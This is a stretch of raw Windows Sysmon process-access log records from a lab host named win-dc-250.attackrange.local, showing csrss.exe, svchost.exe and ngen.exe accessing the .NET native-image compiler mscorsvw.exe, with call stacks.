13:25:35.821{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464F-6000-CF03-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.821{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-CF03-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.743{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-CE03-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.727{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464F-6000-CE03-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.727{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-CE03-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.680{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-CD03-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.665{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464F-6000-CD03-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.665{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-CD03-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.399{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-CC03-000000009A01}4660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.227{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464F-6000-CC03-000000009A01}4660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.227{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-CC03-000000009A01}4660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.087{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-CB03-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.071{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464F-6000-CB03-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.071{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-CB03-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.993{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-DD03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.946{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-DC03-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.931{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4650-6000-DC03-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.931{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-DC03-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.884{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-DB03-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.868{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4650-6000-DB03-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.868{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-DB03-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.837{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-DA03-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.821{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4650-6000-DA03-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 